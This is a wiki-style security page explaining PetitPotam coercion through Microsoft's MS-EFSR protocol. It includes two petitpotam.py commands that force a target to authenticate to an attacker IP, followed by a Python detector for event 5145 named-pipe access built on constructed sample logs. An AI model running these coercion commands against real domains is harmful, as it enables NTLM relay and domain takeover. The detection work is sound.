MS-EFSR abuse (PetitPotam)
MS-EFSR is Microsoft's Encrypting File System Remote protocol. It performs maintenance and management operations on encrypted data that is stored remotely and accessed over a network (docs.microsoft.com), and it is exposed as an RPC interface. That interface is reachable through SMB named pipes, including `\pipe\netlogon`.
In 2019, Google's Project Zero research team found and reported a bug in MS-EFSR that could be combined with an NTLM reflection attack, leading to a local privilege escalation. An insufficient path check in MS-EFSR's `EfsRpcOpenFileRaw` method allowed attackers to force the `SYSTEM` account into creating an executable file of the attacker's choosing, hence providing the attacker with local admin rights.
While the wider implications of this bug for AD DS were only suspected at the time, in 2021 Lionel GILLES used it to remotely coerce a domain-joined machine's authentication. The coerced authentications are made over SMB. MS-EFSR abuse can, however, be combined with WebClient abuse to elicit incoming authentications made over HTTP, which heightens NTLM relay capabilities.
The following MS-EFSR methods were found to be vulnerable:
`EfsRpcAddUsersToFileEx` (unpatched at the time of this article update, 29th December 2021)

```bash
petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
petitpotam.py -method AddUsersToFile $TARGET_IP '\\$ATTACKER_IP\share\foo'
```
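On the detection side, the coercion described above leaves a trace on the target: a client opening one of the named pipes that carry the EFSRPC interface on the `IPC$` share, which Windows records as Security event 5145 when object access auditing for file shares is enabled. The following is an added example (not code from the page or from the PetitPotam project) that runs that heuristic over constructed log lines; the pipe set is an assumption that extends the page's `\pipe\netlogon` with other pipes known to expose MS-EFSR, and the `key=value` log format is constructed for illustration.

```python
"""Flag MS-EFSR (PetitPotam-style) coercion attempts in constructed event 5145 records."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Named pipes assumed to expose the EFSRPC interface (assumption: the page names only netlogon).
EFSRPC_PIPES = {"netlogon", "efsrpc", "lsarpc", "samr", "lsass"}


@dataclass(frozen=True)
class Event5145:
    source_ip: str
    account: str
    share_name: str
    relative_target: str


def parse_5145(line: str) -> Optional[Event5145]:
    """Parse one constructed 'key=value' log line; return None for any other event ID."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    if fields.get("EventID") != "5145":
        return None
    return Event5145(fields["SourceAddress"], fields["AccountName"],
                     fields["ShareName"], fields["RelativeTargetName"])


def is_efsrpc_pipe_access(ev: Event5145) -> bool:
    """True when the access targets IPC$ and a pipe that carries MS-EFSR."""
    return ev.share_name.upper().endswith("IPC$") and ev.relative_target.lower() in EFSRPC_PIPES


def find_coercion_candidates(lines: Iterable[str],
                             trusted_sources: Iterable[str] = ()) -> List[Tuple[str, str, str]]:
    """Return (source_ip, account, pipe) for EFSRPC pipe accesses from non-allowlisted hosts.

    A low-privileged user reaching these pipes on a domain controller from an arbitrary
    workstation is the usual coercion signature; trusted_sources suppresses known admin hosts.
    """
    trusted = set(trusted_sources)
    hits = []
    for line in lines:
        ev = parse_5145(line)
        if ev and is_efsrpc_pipe_access(ev) and ev.source_ip not in trusted:
            hits.append((ev.source_ip, ev.account, ev.relative_target.lower()))
    return hits


# Constructed sample records (not real telemetry): two IPC$ pipe opens, one SYSVOL read, one logon.
SAMPLE_LOG = [
    "EventID=5145 SourceAddress=10.0.0.50 AccountName=jdoe ShareName=\\\\*\\IPC$ RelativeTargetName=efsrpc",
    "EventID=5145 SourceAddress=10.0.0.5 AccountName=admin ShareName=\\\\*\\IPC$ RelativeTargetName=netlogon",
    "EventID=5145 SourceAddress=10.0.0.50 AccountName=jdoe ShareName=\\\\*\\SYSVOL RelativeTargetName=Policies",
    "EventID=4624 SourceAddress=10.0.0.50 AccountName=jdoe",
]

if __name__ == "__main__":
    print(find_coercion_candidates(SAMPLE_LOG, trusted_sources={"10.0.0.5"}))
```

In practice the allowlist and the pipe set are tuned per environment, and a hit is corroborated by an outbound NTLM authentication from the target's machine account to the same client address.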